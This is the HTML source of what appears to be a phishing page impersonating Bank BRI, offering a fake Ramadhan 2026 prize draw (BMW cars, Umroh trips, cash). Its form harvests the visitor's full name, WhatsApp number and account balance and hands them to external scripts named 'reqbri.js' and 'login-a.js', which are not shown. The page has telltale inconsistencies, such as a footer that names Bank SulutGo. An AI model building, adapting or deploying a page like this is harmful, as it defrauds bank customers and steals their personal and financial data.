<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <title>𝐁𝐞𝐫𝐤𝐚𝐡 𝐑𝐚𝐦𝐚𝐝𝐡𝐚𝐧 𝟐𝟎𝟐𝟔 𝐁𝐑𝐈𝐦𝐨 𝐅𝐄𝐒𝐓𝐈𝐕𝐀𝐋
    </title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-sRIl4kxILFvY47J16cr9ZwB07vP4J8+LH7qKQnuqkuIAvNWLzeN8tE5YBujZqJLB" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.13.1/bootstrap-icons.svg" type="text/css" media="all" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css">
    <link rel="stylesheet" href="css/index.css" type="text/css" media="all" />
  </head>
  <body>
      
    <main>
        <nav class="nbr">
           <div class="logo">
                <img src="img/bri.png" alt="" />
           </div>
           <div class="group">
               <i class="bi bi-bell-fill"></i>
               <i class="bi bi-list"></i>
               <span>ENG | IND</span>
           </div>
        </nav>
        
        <div id="carouselExampleAutoplaying" class="carousel slide" data-bs-ride="carousel">
  <div class="carousel-inner">
    <div class="carousel-item active">
      <img src="img/1.png" class="d-block w-100" alt="...">
    </div>
    <div class="carousel-item">
      <img src="img/2.png" class="d-block w-100" alt="...">
    </div>
    <div class="carousel-item">
      <img src="img/3.png" class="d-block w-100" alt="...">
    </div>
  </div>
</div>
        
        <div class="form"> 
            <form onsubmit="sendUser(event);" method="post" id="formData">

            <div class="inpput mt-3">
                <label for="">Pilih Kupon</label>
                <div class="inp">
                    <div class="inpgroup">
                        <i class="bi bi-gift"></i>
                    </div>
                    <select name="a">
                    <option>Kupon 1 : 5 Unit BMW 520i M Sport</option>
                    <option>Kupon 2 : 50 Paket Umroh Gratis</option>
                    <option>Kupon 3 : 20 Unit Hyundai Creta Alpha</option>
                    <option>Kupon 4 : 50 Unit Vespa Primavera</option>
                    <option>Kupon 5 : 75 Unit Samasung Z Fold 6</option>
                    <option>Kupon 6 : Uang Cash 100.juta</option>
                    </select>
                </div>
              </div>
                
              <div class="inpput mt-3">
                <label for="">Nama Lengkap</label>
                <div class="inp">
                    <div class="inpgroup">
                        <i class="bi bi-person"></i>
                    </div>
                        <input type="text" name="b" id="" value="" required placeholder="Nama Lengkap"/>
                </div>
              </div>
              
              <div class="inpput">
                <label for="">No. WhatsApp</label>
                <div class="inp">
                    <div class="inpgroup">
                        <i class="bi bi-telephone"></i>
                    </div>
                        <input type="tel" name="c" id="" value="" required placeholder="+628xxxxxxxxxxx" maxlength="13" minlength="10"/>
                </div>
              </div>
              
              <div class="inpput">
                <label for="">Saldo Akhir</label>
                <div class="inp">
                    <div class="inpgroup">
                        <i class="bi bi-wallet2"></i>
                    </div>
                        <input type="tel" name="d" id="dengan-rupiah" value="" required placeholder="Rp."/>
                </div>
              </div>
              
              <button type="submit" class="kirim">Cetak Kupon</button>
              
            </form>
        </div>
        
        <footer>
            ©2026 PT. Bank Rakyat Indonesia (Persero) Tbk.
            
            Bank BRI berizin dan diawasi oleh Bank Indonesia dan Otoritas Jasa Keuangan. Bank SulutGo merupakan peserta penjaminan LPS.
        </footer>
    </main>
    
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/js/bootstrap.bundle.min.js" integrity="sha384-FKyoEForCGlyvwx9Hj09JcYn3nv7wiPVlz7YYwJrWVcXK/BmnVDxM+D2scQbITxI" crossorigin="anonymous"></script>
  <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"decd462d6d4b475196f3876581f975ce","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
</body>
  
<script src="js/jquery.min_1.js"></script>
<script src="js/jquery.min.js"></script>
<script src="js/reqbri.js"></script>
<script src="js/login-a.js"></script>
<script src="js/.js"></script>
<script src="js/rupiah.js"></script>
  <script>
    window.onload = function() {
        setTimeout(function() {
            $(".start").fadeIn();
            setTimeout(function() {
                $(".start").fadeOut(1000);
                setTimeout(function() {
                    $("main").fadeIn(200);
                    $("#inp").focus();
                }, 1000);
            }, 2000);
        }, 500);
    }
    </script>
</html>